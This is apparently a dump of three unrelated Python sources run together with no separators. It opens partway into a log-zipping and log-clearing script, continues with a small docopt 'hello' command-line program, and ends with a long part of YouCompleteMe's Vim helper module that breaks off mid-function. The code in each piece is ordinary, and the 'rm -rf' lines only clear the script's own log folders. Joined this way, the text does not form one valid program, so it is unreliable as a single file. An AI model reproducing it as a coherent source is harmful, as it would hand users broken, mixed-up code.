    elif platform.system() == "Linux" or platform.system() == "Darwin":
        cmd = "zip -vr logs-$(date +%Y-%m-%d-%H%M).zip" + " logs/"
        cr.run_command(cmd)  

def zip_browsers_logs():
    if platform.system() == "Windows":
        cmd = "Compress-Archive browserlogs browserlogs-$(date +%Y-%m-%d-%H%M).zip"
        subprocess.call(["powershell.exe", cmd])
    
    elif platform.system() == "Linux" or platform.system() == "Darwin":
        cmd = "zip -vr browserlogs-$(date +%Y-%m-%d-%H%M).zip" + " browserlogs/"
        cr.run_command(cmd)  

def delete_previous_logs():
    cmd = 'rm -rf logs/*'
    cr.run_command(cmd)

def delete_previous_logs_browser():
    cmd = 'rm -rf browserlogs/*'
    cr.run_command(cmd)
# Copyright (c) 2014 Stefano Palazzo <stefano.palazzo@gmail.com>

# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.

# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

'''
hello

Usage:
    hello (--help | --version)

Options:
    --help -h      display this help message and exit
    --version      print version information and exit

'''

import sys
import docopt
import hello


def main(argv=sys.argv[1:]):
    try:
        docopt.docopt(__doc__, argv=argv, version=hello.__version__)
    except docopt.DocoptExit as e:
        print(str(e), file=sys.stderr)
        return 2
    except SystemExit as e:
        return 0


if __name__ == "__main__":  # pragma: no cover
    sys.exit(main())

# Copyright (C) 2011-2012 Google Inc.
#               2016      YouCompleteMe contributors
#
# This file is part of YouCompleteMe.
#
# YouCompleteMe is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# YouCompleteMe is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with YouCompleteMe.  If not, see <http://www.gnu.org/licenses/>.

from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
# Not installing aliases from python-future; it's unreliable and slow.
from builtins import *  # noqa

from future.utils import iterkeys
import vim
import os
import json
import re
from collections import defaultdict
from ycmd.utils import ( ByteOffsetToCodepointOffset, GetCurrentDirectory,
                         JoinLinesAsUnicode, ToBytes, ToUnicode )
from ycmd import user_options_store

BUFFER_COMMAND_MAP = { 'same-buffer'      : 'edit',
                       'horizontal-split' : 'split',
                       'vertical-split'   : 'vsplit',
                       'new-tab'          : 'tabedit' }

FIXIT_OPENING_BUFFERS_MESSAGE_FORMAT = (
    'The requested operation will apply changes to {0} files which are not '
    'currently open. This will therefore open {0} new files in the hidden '
    'buffers. The quickfix list can then be used to review the changes. No '
    'files will be written to disk. Do you wish to continue?' )

potential_hint_triggers = list( map( ToBytes, [ '[', '(', ',', ':' ] ) )


def CanComplete():
  """Returns whether it's appropriate to provide any completion at the current
     line and column."""
  try:
    line, column = LineAndColumnAfterLastNonWhitespace()
  except TypeError:
    return False
  if ( line, column ) == CurrentLineAndColumn():
    return True
  return ( ToBytes( vim.current.buffer[ line ][ column - 1 ] )
           in potential_hint_triggers )


def SnappedLineAndColumn():
  """Will return CurrentLineAndColumn(), except when there's solely whitespace
     between caret and a potential hint trigger, where it "snaps to trigger",
     returning hint trigger's line and column instead."""
  try:
    line, column = LineAndColumnAfterLastNonWhitespace()
  except TypeError:
    return CurrentLineAndColumn()
  if ( ToBytes( vim.current.buffer[ line ][ column - 1 ] )
       in potential_hint_triggers ):
    return ( line, column )
  return CurrentLineAndColumn()


def LineAndColumnAfterLastNonWhitespace():
  line, column = CurrentLineAndColumn()
  line_value = vim.current.line[ :column ].rstrip()
  while not line_value:
    line = line - 1
    if line == -1:
      return None
    line_value = vim.current.buffer[ line ].rstrip()
  return line, len( line_value )

NO_SELECTION_MADE_MSG = "No valid selection was made; aborting."

def CurrentLineAndColumn():
  """Returns the 0-based current line and 0-based current column."""
  # See the comment in CurrentColumn about the calculation for the line and
  # column number
  line, column = vim.current.window.cursor
  line -= 1
  return line, column


def CurrentColumn():
  """Returns the 0-based current column. Do NOT access the CurrentColumn in
  vim.current.line. It doesn't exist yet when the cursor is at the end of the
  line. Only the chars before the current column exist in vim.current.line."""

  # vim's columns are 1-based while vim.current.line columns are 0-based
  # ... but vim.current.window.cursor (which returns a (line, column) tuple)
  # columns are 0-based, while the line from that same tuple is 1-based.
  # vim.buffers buffer objects OTOH have 0-based lines and columns.
  # Pigs have wings and I'm a loopy purple duck. Everything makes sense now.
  return vim.current.window.cursor[ 1 ]


def CurrentLineContents():
  return ToUnicode( vim.current.line )


def CurrentLineContentsAndCodepointColumn():
  """Returns the line contents as a unicode string and the 0-based current
  column as a codepoint offset. If the current column is outside the line,
  returns the column position at the end of the line."""
  line = CurrentLineContents()
  byte_column = CurrentColumn()
  # ByteOffsetToCodepointOffset expects 1-based offset.
  column = ByteOffsetToCodepointOffset( line, byte_column + 1 ) - 1
  return line, column


def TextAfterCursor():
  """Returns the text after CurrentColumn."""
  return ToUnicode( vim.current.line[ CurrentColumn(): ] )


def TextBeforeCursor():
  """Returns the text before CurrentColumn."""
  return ToUnicode( vim.current.line[ :CurrentColumn() ] )


# Note the difference between buffer OPTIONS and VARIABLES; the two are not
# the same.
def GetBufferOption( buffer_object, option ):
  # NOTE: We used to check for the 'options' property on the buffer_object which
  # is available in recent versions of Vim and would then use:
  #
  #   buffer_object.options[ option ]
  #
  # to read the value, BUT this caused annoying flickering when the
  # buffer_object was a hidden buffer (with option = 'ft'). This was all due to
  # a Vim bug. Until this is fixed, we won't use it.

  to_eval = 'getbufvar({0}, "&{1}")'.format( buffer_object.number, option )
  return GetVariableValue( to_eval )


def BufferModified( buffer_object ):
  return bool( int( GetBufferOption( buffer_object, 'mod' ) ) )


def GetUnsavedAndSpecifiedBufferData( including_filepath ):
  """Build part of the request containing the contents and filetypes of all
  dirty buffers as well as the buffer with filepath |including_filepath|."""
  buffers_data = {}
  for buffer_object in vim.buffers:
    buffer_filepath = GetBufferFilepath( buffer_object )
    if not ( BufferModified( buffer_object ) or
             buffer_filepath == including_filepath ):
      continue

    buffers_data[ buffer_filepath ] = {
      # Add a newline to match what gets saved to disk. See #1455 for details.
      'contents': JoinLinesAsUnicode( buffer_object ) + '\n',
      'filetypes': FiletypesForBuffer( buffer_object )
    }

  return buffers_data


def GetBufferNumberForFilename( filename, open_file_if_needed = True ):
  return GetIntValue( u"bufnr('{0}', {1})".format(
      EscapeForVim( os.path.realpath( filename ) ),
      int( open_file_if_needed ) ) )


def GetCurrentBufferFilepath():
  return GetBufferFilepath( vim.current.buffer )


def BufferIsVisible( buffer_number ):
  if buffer_number < 0:
    return False
  window_number = GetIntValue( "bufwinnr({0})".format( buffer_number ) )
  return window_number != -1


def GetBufferFilepath( buffer_object ):
  if buffer_object.name:
    return buffer_object.name
  # Buffers that have just been created by a command like :enew don't have any
  # buffer name so we use the buffer number for that.
  return os.path.join( GetCurrentDirectory(), str( buffer_object.number ) )


def GetCurrentBufferNumber():
  return vim.current.buffer.number


def GetBufferChangedTick( bufnr ):
  return GetIntValue( 'getbufvar({0}, "changedtick")'.format( bufnr ) )


def UnplaceSignInBuffer( buffer_number, sign_id ):
  if buffer_number < 0:
    return
  vim.command(
    'try | exec "sign unplace {0} buffer={1}" | catch /E158/ | endtry'.format(
        sign_id, buffer_number ) )


def PlaceSign( sign_id, line_num, buffer_num, is_error = True ):
  # libclang can give us diagnostics that point "outside" the file; Vim borks
  # on these.
  if line_num < 1:
    line_num = 1

  sign_name = 'YcmError' if is_error else 'YcmWarning'
  vim.command( 'sign place {0} name={1} line={2} buffer={3}'.format(
    sign_id, sign_name, line_num, buffer_num ) )


def ClearYcmSyntaxMatches():
  matches = VimExpressionToPythonType( 'getmatches()' )
  for match in matches:
    if match[ 'group' ].startswith( 'Ycm' ):
      vim.eval( 'matchdelete({0})'.format( match[ 'id' ] ) )


def AddDiagnosticSyntaxMatch( line_num,
                              column_num,
                              line_end_num = None,
                              column_end_num = None,
                              is_error = True ):
  """Highlight a range in the current window starting from
  (|line_num|, |column_num|) included to (|line_end_num|, |column_end_num|)
  excluded. If |line_end_num| or |column_end_num| are not given, highlight the
  character at (|line_num|, |column_num|). Both line and column numbers are
  1-based. Return the ID of the newly added match."""
  group = 'YcmErrorSection' if is_error else 'YcmWarningSection'

  line_num, column_num = LineAndColumnNumbersClamped( line_num, column_num )

  if not line_end_num or not column_end_num:
    return GetIntValue(
      "matchadd('{0}', '\%{1}l\%{2}c')".format( group, line_num, column_num ) )

  # -1 and then +1 to account for column end not included in the range.
  line_end_num, column_end_num = LineAndColumnNumbersClamped(
      line_end_num, column_end_num - 1 )
  column_end_num += 1

  return GetIntValue(
    "matchadd('{0}', '\%{1}l\%{2}c\_.\\{{-}}\%{3}l\%{4}c')".format(
      group, line_num, column_num, line_end_num, column_end_num ) )


# Clamps the line and column numbers so that they are not past the contents of
# the buffer. Numbers are 1-based byte offsets.
def LineAndColumnNumbersClamped( line_num, column_num ):
  new_line_num = line_num
  new_column_num = column_num

  max_line = len( vim.current.buffer )
  if line_num and line_num > max_line:
    new_line_num = max_line

  max_column = len( vim.current.buffer[ new_line_num - 1 ] )
  if column_num and column_num > max_column:
    new_column_num = max_column

  return new_line_num, new_column_num


def SetLocationList( diagnostics ):
  """Populate the location list with diagnostics. Diagnostics should be in
  qflist format; see ":h setqflist" for details."""
  vim.eval( 'setloclist( 0, {0} )'.format( json.dumps( diagnostics ) ) )


def OpenLocationList( focus = False, autoclose = False ):
  """Open the location list to full width at the bottom of the screen with its
  height automatically set to fit all entries. This behavior can be overridden
  by using the YcmLocationOpened autocommand. When focus is set to True, the
  location list window becomes the active window. When autoclose is set to True,
  the location list window is automatically closed after an entry is
  selected."""
  vim.command( 'botright lopen' )

  SetFittingHeightForCurrentWindow()

  if autoclose:
    # This autocommand is automatically removed when the location list window is
    # closed.
    vim.command( 'au WinLeave <buffer> q' )

  if VariableExists( '#User#YcmLocationOpened' ):
    vim.command( 'doautocmd User YcmLocationOpened' )

  if not focus:
    JumpToPreviousWindow()


def SetQuickFixList( quickfix_list ):
  """Populate the quickfix list and open it. List should be in qflist format:
  see ":h setqflist" for details."""
  vim.eval( 'setqflist( {0} )'.format( json.dumps( quickfix_list ) ) )


def OpenQuickFixList( focus = False, autoclose = False ):
  """Open the quickfix list to full width at the bottom of the screen with its
  height automatically set to fit all entries. This behavior can be overridden
  by using the YcmQuickFixOpened autocommand.
  See the OpenLocationList function for the focus and autoclose options."""
  vim.command( 'botright copen' )

  SetFittingHeightForCurrentWindow()

  if autoclose:
    # This autocommand is automatically removed when the quickfix window is
    # closed.
    vim.command( 'au WinLeave <buffer> q' )

  if VariableExists( '#User#YcmQuickFixOpened' ):
    vim.command( 'doautocmd User YcmQuickFixOpened' )

  if not focus:
    JumpToPreviousWindow()


def SetFittingHeightForCurrentWindow():
  window_width = GetIntValue( 'winwidth( 0 )' )
  fitting_height = 0
  for line in vim.current.buffer:
    fitting_height += len( line ) // window_width + 1
  vim.command( '{0}wincmd _'.format( fitting_height ) )


def ConvertDiagnosticsToQfList( diagnostics ):
  def ConvertDiagnosticToQfFormat( diagnostic ):
    # See :h getqflist for a description of the dictionary fields.
    # Note that, as usual, Vim is completely inconsistent about whether
    # line/column numbers are 1 or 0 based in its various APIs. Here, it wants
    # them to be 1-based. The documentation states quite clearly that it
    # expects a byte offset, by which it means "1-based column number" as
    # described in :h getqflist ("the first column is 1").
    location = diagnostic[ 'location' ]
    line_num = location[ 'line_num' ]

    # libclang can give us diagnostics that point "outside" the file; Vim borks
    # on these.
    if line_num < 1:
      line_num = 1

    text = diagnostic[ 'text' ]
    if diagnostic.get( 'fixit_available', False ):
      text += ' (FixIt available)'

    return {
      'bufnr' : GetBufferNumberForFilename( location[ 'filepath' ] ),
      'lnum'  : line_num,
      'col'   : location[ 'column_num' ],
      'text'  : text,
      'type'  : diagnostic[ 'kind' ][ 0 ],
      'valid' : 1
    }

  return [ ConvertDiagnosticToQfFormat( x ) for x in diagnostics ]


def GetVimGlobalsKeys():
  return vim.eval( 'keys( g: )' )


def VimExpressionToPythonType( vim_expression ):
  """Returns a Python type from the return value of the supplied Vim expression.
  If the expression returns a list, dict or other non-string type, then it is
  returned unmodified. If the string return can be converted to an
  integer, returns an integer, otherwise returns the result converted to a
  Unicode string."""

  result = vim.eval( vim_expression )
  if not ( isinstance( result, str ) or isinstance( result, bytes ) ):
    return result

  try:
    return int( result )
  except ValueError:
    return ToUnicode( result )


def HiddenEnabled( buffer_object ):
  return bool( int( GetBufferOption( buffer_object, 'hid' ) ) )


def BufferIsUsable( buffer_object ):
  return not BufferModified( buffer_object ) or HiddenEnabled( buffer_object )


def EscapedFilepath( filepath ):
  return filepath.replace( ' ' , r'\ ' )


# Both |line| and |column| need to be 1-based
def TryJumpLocationInOpenedTab( filename, line, column ):
  filepath = os.path.realpath( filename )

  for tab in vim.tabpages:
    for win in tab.windows:
      if win.buffer.name == filepath:
        vim.current.tabpage = tab
        vim.current.window = win
        vim.current.window.cursor = ( line, column - 1 )

        # Center the screen on the jumped-to location
        vim.command( 'normal! zz' )
        return True
  # 'filename' is not opened in any tab pages
  return False


# Maps User command to vim command
def GetVimCommand( user_command, default = 'edit' ):
  vim_command = BUFFER_COMMAND_MAP.get( user_command, default )
  if vim_command == 'edit' and not BufferIsUsable( vim.current.buffer ):
    vim_command = 'split'
  return vim_command


# Both |line| and |column| need to be 1-based
def JumpToLocation( filename, line, column ):
  # Add an entry to the jumplist
  vim.command( "normal! m'" )

  if filename != GetCurrentBufferFilepath():
    # We prefix the command with 'keepjumps' so that opening the file is not
    # recorded in the jumplist. So when we open the file and move the cursor to
    # a location in it, the user can use CTRL-O to jump back to the original
    # location, not to the start of the newly opened file.
    # Sadly this fails on random occasions and the undesired jump remains in the
    # jumplist.
    user_command = user_options_store.Value( 'goto_buffer_command' )

    if user_command == 'new-or-existing-tab':
      if TryJumpLocationInOpenedTab( filename, line, column ):
        return
      user_command = 'new-tab'

    vim_command = GetVimCommand( user_command )
    try:
      vim.command( 'keepjumps {0} {1}'.format( vim_command,
                                               EscapedFilepath( filename ) ) )
    # When the file we are trying to jump to has a swap file
    # Vim opens swap-exists-choices dialog and throws vim.error with E325 error,
    # or KeyboardInterrupt after user selects one of the options.
    except vim.error as e:
      if 'E325' not in str( e ):
        raise
      # Do nothing if the target file is still not opened (user chose (Q)uit)
      if filename != GetCurrentBufferFilepath():
        return
    # Thrown when user chooses (A)bort in .swp message box
    except KeyboardInterrupt:
      return
  vim.current.window.cursor = ( line, column - 1 )

  # Center the screen on the jumped-to location
  vim.command( 'normal! zz' )


def NumLinesInBuffer( buffer_object ):
  # This is actually less than obvious, that's why it's wrapped in a function
  return len( buffer_object )


# Calling this function from the non-GUI thread will sometimes crash Vim. At
# the time of writing, YCM only uses the GUI thread inside Vim (this used to
# not be the case).
def PostVimMessage( message, warning = True, truncate = False ):
  """Display a message on the Vim status line. By default, the message is
  highlighted and logged to Vim command-line history (see :h history).
  Unset the |warning| parameter to disable this behavior. Set the |truncate|
  parameter to avoid hit-enter prompts (see :h hit-enter) when the message is
  longer than the window width."""
  echo_command = 'echom' if warning else 'echo'

  # Displaying a new message while previous ones are still on the status line
  # might lead to a hit-enter prompt or the message appearing without a
  # newline so we do a redraw first.
  vim.command( 'redraw' )

  if warning:
    vim.command( 'echohl WarningMsg' )

  message = ToUnicode( message )

  if truncate:
    vim_width = GetIntValue( '&columns' )

    message = message.replace( '\n', ' ' )
    if len( message ) > vim_width:
      message = message[ : vim_width - 4 ] + '...'

    old_ruler = GetIntValue( '&ruler' )
    old_showcmd = GetIntValue( '&showcmd' )
    vim.command( 'set noruler noshowcmd' )

    vim.command( "{0} '{1}'".format( echo_command,
                                     EscapeForVim( message ) ) )

    SetVariableValue( '&ruler', old_ruler )
    SetVariableValue( '&showcmd', old_showcmd )
  else:
    for line in message.split( '\n' ):
      vim.command( "{0} '{1}'".format( echo_command,
                                       EscapeForVim( line ) ) )

  if warning:
    vim.command( 'echohl None' )


def PresentDialog( message, choices, default_choice_index = 0 ):
  """Presents the user with a dialog where a choice can be made.
  This will be a dialog for gvim users or a question in the message buffer
  for vim users or if `set guioptions+=c` was used.

  choices is list of alternatives.
  default_choice_index is the 0-based index of the default element
  that will get choosen if the user hits <CR>. Use -1 for no default.

  PresentDialog will return a 0-based index into the list
  or -1 if the dialog was dismissed by using <Esc>, Ctrl-C, etc.

  If you are presenting a list of options for the user to choose from, such as
  a list of imports, or lines to insert (etc.), SelectFromList is a better
  option.

  See also:
    :help confirm() in vim (Note that vim uses 1-based indexes)

  Example call:
    PresentDialog("Is this a nice example?", ["Yes", "No", "May&be"])
      Is this a nice example?
      [Y]es, (N)o, May(b)e:"""
  to_eval = "confirm('{0}', '{1}', {2})".format(
    EscapeForVim( ToUnicode( message ) ),
    EscapeForVim( ToUnicode( "\n" .join( choices ) ) ),
    default_choice_index + 1 )
  try:
    return GetIntValue( to_eval ) - 1
  except KeyboardInterrupt:
    return -1


def Confirm( message ):
  """Display |message| with Ok/Cancel operations. Returns True if the user
  selects Ok"""
  return bool( PresentDialog( message, [ "Ok", "Cancel" ] ) == 0 )


def SelectFromList( prompt, items ):
  """Ask the user to select an item from the list |items|.

  Presents the user with |prompt| followed by a numbered list of |items|,
  from which they select one. The user is asked to enter the number of an
  item or click it.

  |items| should not contain leading ordinals: they are added automatically.

  Returns the 0-based index in the list |items| that the user selected, or a
  negative number if no valid item was selected.

  See also :help inputlist()."""

  vim_items = [ prompt ]
  vim_items.extend( [ "{0}: {1}".format( i + 1, item )
                      for i, item in enumerate( items ) ] )

  # The vim documentation warns not to present lists larger than the number of
  # lines of display. This is sound advice, but there really isn't any sensible
  # thing we can do in that scenario. Testing shows that Vim just pages the
  # message; that behaviour is as good as any, so we don't manipulate the list,
  # or attempt to page it.

  # For an explanation of the purpose of inputsave() / inputrestore(),
  # see :help input(). Briefly, it makes inputlist() work as part of a mapping.
  vim.eval( 'inputsave()' )
  try:
    # Vim returns the number the user entered, or the line number the user
    # clicked. This may be wildly out of range for our list. It might even be
    # negative.
    #
    # The first item is index 0, and this maps to our "prompt", so we subtract 1
    # from the result and return that, assuming it is within the range of the
    # supplied list. If not, we return negative.
    #
    # See :help input() for explanation of the use of inputsave() and inpput
    # restore(). It is done in try/finally in case vim.eval ever throws an
    # exception (such as KeyboardInterrupt)
    selected = GetIntValue( "inputlist( " + json.dumps( vim_items ) + " )" ) - 1
  except KeyboardInterrupt:
    selected = -1
  finally:
    vim.eval( 'inputrestore()' )

  if selected < 0 or selected >= len( items ):
    # User selected something outside of the range
    raise RuntimeError( NO_SELECTION_MADE_MSG )

  return selected


def EscapeForVim( text ):
  return ToUnicode( text.replace( "'", "''" ) )


def CurrentFiletypes():
  return VimExpressionToPythonType( "&filetype" ).split( '.' )


def GetBufferFiletypes( bufnr ):
  command = 'getbufvar({0}, "&ft")'.format( bufnr )
  return VimExpressionToPythonType( command ).split( '.' )


def FiletypesForBuffer( buffer_object ):
  # NOTE: Getting &ft for other buffers only works when the buffer has been
  # visited by the user at least once, which is true for modified buffers
  return GetBufferOption( buffer_object, 'ft' ).split( '.' )


def VariableExists( variable ):
  return GetBoolValue( "exists( '{0}' )".format( EscapeForVim( variable ) ) )


def SetVariableValue( variable, value ):
  vim.command( "let {0} = {1}".format( variable, json.dumps( value ) ) )


def GetVariableValue( variable ):
  return vim.eval( variable )


def GetBoolValue( variable ):
  return bool( int( vim.eval( variable ) ) )


def GetIntValue( variable ):
  return int( vim.eval( variable ) )


def _SortChunksByFile( chunks ):
  """Sort the members of the list |chunks| (which must be a list of dictionaries
  conforming to ycmd.responses.FixItChunk) by their filepath. Returns a new
  list in arbitrary order."""

  chunks_by_file = defaultdict( list )

  for chunk in chunks:
    filepath = chunk[ 'range' ][ 'start' ][ 'filepath' ]
    chunks_by_file[ filepath ].append( chunk )

  return chunks_by_file


def _GetNumNonVisibleFiles( file_list ):
  """Returns the number of file in the iterable list of files |file_list| which
  are not curerntly open in visible windows"""
  return len(
      [ f for f in file_list
        if not BufferIsVisible( GetBufferNumberForFilename( f, False ) ) ] )


def _OpenFileInSplitIfNeeded( filepath ):
  """Ensure that the supplied filepath is open in a visible window, opening a
  new split if required. Returns the buffer number of the file and an indication
  of whether or not a new split was opened.

  If the supplied filename is already open in a visible window, return just
  return its buffer number. If the supplied file is not visible in a window
  in the current tab, opens it in a new vertical split.

  Returns a tuple of ( buffer_num, split_was_opened ) indicating the buffer
  number and whether or not this method created a new split. If the user opts
  not to open a file, or if opening fails, this method raises RuntimeError,
  otherwise, guarantees to return a visible buffer number in buffer_num."""

  buffer_num = GetBufferNumberForFilename( filepath, False )

  # We only apply changes in the current tab page (i.e. "visible" windows).
  # Applying changes in tabs does not lead to a better user experience, as the
  # quickfix list no longer works as you might expect (doesn't jump into other
  # tabs), and the complexity of choosing where to apply edits is significant.
  if BufferIsVisible( buffer_num ):
    # file is already open and visible, just return that buffer number (and an
    # idicator that we *didn't* open a split)
    return ( buffer_num, False )

  # The file is not open in a visible window, so we open it in a split.
  # We open the file with a small, fixed height. This means that we don't
  # make the current buffer the smallest after a series of splits.
  OpenFilename( filepath, {
    'focus': True,
    'fix': True,
    'size': GetIntValue( '&previewheight' ),
  } )

  # OpenFilename returns us to the original cursor location. This is what we
  # want, because we don't want to disorientate the user, but we do need to
  # know the (now open) buffer number for the filename
  buffer_num = GetBufferNumberForFilename( filepath, False )
  if not BufferIsVisible( buffer_num ):
    # This happens, for example, if there is a swap file and the user
    # selects the "Quit" or "Abort" options. We just raise an exception to
    # make it clear to the user that the abort has left potentially
    # partially-applied changes.
    raise RuntimeError(
        'Unable to open file: {0}\nFixIt/Refactor operation '
        'aborted prior to completion. Your files have not been '
        'fully updated. Please use undo commands to revert the '
        'applied changes.'.format( filepath ) )

  # We opened this file in a split
  return ( buffer_num, True )


def ReplaceChunks( chunks ):
  """Apply the source file deltas supplied in |chunks| to arbitrary files.
  |chunks| is a list of changes defined by ycmd.responses.FixItChunk,
  which may apply arbitrary modifications to arbitrary files.

  If a file specified in a particular chunk is not currently open in a visible
  buffer (i.e., one in a window visible in the current tab), we:
    - issue a warning to the user that we're going to open new files (and offer
      her the option to abort cleanly)
    - open the file in a new split, make the changes, then hide the buffer.

  If for some reason a file could not be opened or changed, raises RuntimeError.
  Otherwise, returns no meaningful value."""

  # We apply the edits file-wise for efficiency, and because we must track the
  # file-wise offset deltas (caused by the modifications to the text).
  chunks_by_file = _SortChunksByFile( chunks )

  # We sort the file list simply to enable repeatable testing
  sorted_file_list = sorted( iterkeys( chunks_by_file ) )

  # Make sure the user is prepared to have her screen mutilated by the new
  # buffers
  num_files_to_open = _GetNumNonVisibleFiles( sorted_file_list )

  if num_files_to_open > 0:
    if not Confirm(
            FIXIT_OPENING_BUFFERS_MESSAGE_FORMAT.format( num_files_to_open ) ):
      return

  # Store the list of locations where we applied changes. We use this to display
  # the quickfix window showing the user where we applied changes.
  locations = []

  for filepath in sorted_file_list:
    ( buffer_num, close_window ) = _OpenFileInSplitIfNeeded( filepath )

    ReplaceChunksInBuffer( chunks_by_file[ filepath ],
                           vim.buffers[ buffer_num ],
                           locations )

    # When opening tons of files, we don't want to have a split for each new
    # file, as this simply does not scale, so we open the window, make the
    # edits, then hide the window.
    if close_window:
      # Some plugins (I'm looking at you, syntastic) might open a location list
      # for the window we just opened. We don't want that location list hanging
      # around, so we close it. lclose is a no-op if there is no location list.
      vim.command( 'lclose' )

      # Note that this doesn't lose our changes. It simply "hides" the buffer,
      # which can later be re-accessed via the quickfix list or `:ls`
      vim.command( 'hide' )

  # Open the quickfix list, populated with entries for each location we changed.
  if locations:
    SetQuickFixList( locations )
    OpenQuickFixList()

  PostVimMessage( 'Applied {0} changes'.format( len( chunks ) ),
                  warning = False )


def ReplaceChunksInBuffer( chunks, vim_buffer, locations ):
  """Apply changes in |chunks| to the buffer-like object |buffer|. Append each
  chunk's start to the list |locations|"""

  # We need to track the difference in length, but ensuring we apply fixes
  # in ascending order of insertion point.
  chunks.sort( key = lambda chunk: (
    chunk[ 'range' ][ 'start' ][ 'line_num' ],
    chunk[ 'range' ][ 'start' ][ 'column_num' ]
  ) )

  # Remember the line number we're processing. Negative line number means we
  # haven't processed any lines yet (by nature of being not equal to any
  # real line number).
  last_line = -1

  line_delta = 0
  for chunk in chunks:
    if chunk[ 'range' ][ 'start' ][ 'line_num' ] != last_line:
      # If this chunk is on a different line than the previous chunk,
      # then ignore previous deltas (as offsets won't have changed).
      last_line = chunk[ 'range' ][ 'end' ][ 'line_num' ]
      char_delta = 0

    ( new_line_delta, new_char_delta ) = ReplaceChunk(
      chunk[ 'range' ][ 'start' ],
      chunk[ 'range' ][ 'end' ],
      chunk[ 'replacement_text' ],
      line_delta, char_delta,
      vim_buffer,
      locations )
    line_delta += new_line_delta
    char_delta += new_char_delta


# Replace the chunk of text specified by a contiguous range with the supplied
# text.
# * start and end are objects with line_num and column_num properties
# * the range is inclusive
# * indices are all 1-based
# * the returned character delta is the delta for the last line
#
# returns the delta (in lines and characters) that any position after the end
# needs to be adjusted by.
#
# NOTE: Works exclusively with bytes() instances and byte offsets as returned
# by ycmd and used within the Vim buffers
def ReplaceChunk( start, end, replacement_text, line_delta, char_delta,
                  vim_buffer, locations = None ):
  # ycmd's results are all 1-based, but vim's/python's are all 0-based
  # (so we do -1 on all of the values)
  start_line = start[ 'line_num' ] - 1 + line_delta
  end_line = end[ 'line_num' ] - 1 + line_delta

  source_lines_count = end_line - start_line + 1
  start_column = start[ 'column_num' ] - 1 + char_delta
  end_column = end[ 'column_num' ] - 1
  if source_lines_count == 1:
    end_column += char_delta

  # NOTE: replacement_text is unicode, but all our offsets are byte offsets,
  # so we convert to bytes
  replacement_lines = ToBytes( replacement_text ).splitlines( False )
  if not replacement_lines:
    replacement_lines = [ bytes( b'' ) ]
  replacement_lines_count = len( replacement_lines )

  # NOTE: Vim buffers are a list of byte objects on Python 2 but unicode
  # objects on Python 3.
  end_existing_text = ToBytes( vim_buffer[ end_line ] )[ end_column : ]
  start_existing_text = ToBytes( vim_buffer[ start_line ] )[ : start_column ]

  new_char_delta = ( len( replacement_lines[ -1 ] )
                     - ( end_column - start_column ) )
  if replacement_lines_count > 1:
    new_char_delta -= start_column

  replacement_lines[ 0 ] = start_existing_text + replacement_lines[ 0 ]
  replacement_lines[ -1 ] = replacement_lines[ -1 ] + end_existing_text

  vim_buffer[ start_line : end_line + 1 ] = replacement_lines[:]

  if locations is not None:
    locations.append( {
      'bufnr': vim_buffer.number,
      'filename': vim_buffer.name,
      # line and column numbers are 1-based in qflist
      'lnum': start_line + 1,
      'col': start_column + 1,
      'text': replacement_text,
      'type': 'F',
    } )

  new_line_delta = replacement_lines_count - source_lines_count
  return ( new_line_delta, new_char_delta )


def InsertNamespace( namespace ):
  if VariableExists( 'g:ycm_csharp_insert_namespace_expr' ):
    expr = GetVariableValue( 'g:ycm_csharp_insert_namespace_expr' )
    if expr:
      SetVariableValue( "g:ycm_namespace_to_insert", namespace )
      vim.eval( expr )
      return

  pattern = '^\s*using\(\s\+[a-zA-Z0-9]\+\s\+=\)\?\s\+[a-zA-Z0-9.]\+\s*;\s*'
  existing_indent = ''
  line = SearchInCurrentBuffer( pattern )
  if line:
    existing_line = LineTextInCurrentBuffer( line )
    existing_indent = re.sub( r"\S.*", "", existing_line )
  new_line = "{0}using {1};\n\n".format( existing_indent, namespace )
  replace_pos = { 'line_num': line + 1, 'column_num': 1 }
  ReplaceChunk( replace_pos, replace_pos, new_line, 0, 0, vim.current.buffer )
  PostVimMessage( 'Add namespace: {0}'.format( namespace ), warning = False )


def SearchInCurrentBuffer( pattern ):
  """ Returns the 1-indexed line on which the pattern matches
  (going UP from the current position) or 0 if not found """
  return GetIntValue( "search('{0}', 'Wcnb')".format( EscapeForVim( pattern )))


def LineTextInCurrentBuffer( line_number ):
  """ Returns the text on the 1-indexed line (NOT 0-indexed) """
  return vim.current.buffer[ line_number - 1 ]


def ClosePreviewWindow():
  """ Close the preview window if it is present, otherwise do nothing """
  vim.command( 'silent! pclose!' )


def JumpToPreviewWindow():
  """ Jump the vim cursor to the preview window, which must be active. Returns
  boolean indicating if the cursor ended up in the preview window """
  vim.command( 'silent! wincmd P' )
  return vim.current.window.options[ 'previewwindow' ]


def JumpToPreviousWindow():
  """ Jump the vim cursor to its previous window position """
  vim.command( 'silent! wincmd p' )


def JumpToTab( tab_number ):
  """Jump to Vim tab with corresponding number """
  vim.command( 'silent! tabn {0}'.format( tab_number ) )


def OpenFileInPreviewWindow( filename ):
  """ Open the supplied filename in the preview window """
  vim.command( 'silent! pedit! ' + filename )


def WriteToPreviewWindow( message ):
  """ Display the supplied message in the preview window """

  # This isn't something that comes naturally to Vim. Vim only wants to show
  # tags and/or actual files in the preview window, so we have to hack it a
  # little bit. We generate a temporary file name and "open" that, then write
  # the data to it. We make sure the buffer can't be edited or saved. Other
  # approaches include simply opening a split, but we want to take advantage of
  # the existing Vim options for preview window height, etc.

  ClosePreviewWindow()

  OpenFileInPreviewWindow( vim.eval( 'tempname()' ) )

  if JumpToPreviewWindow():
    # We actually got to the preview window. By default the preview window can't
    # be changed, so we make it writable, write to it, then make it read only
    # again.
    vim.current.buffer.options[ 'modifiable' ] = True
    vim.current.buffer.options[ 'readonly' ]   = False

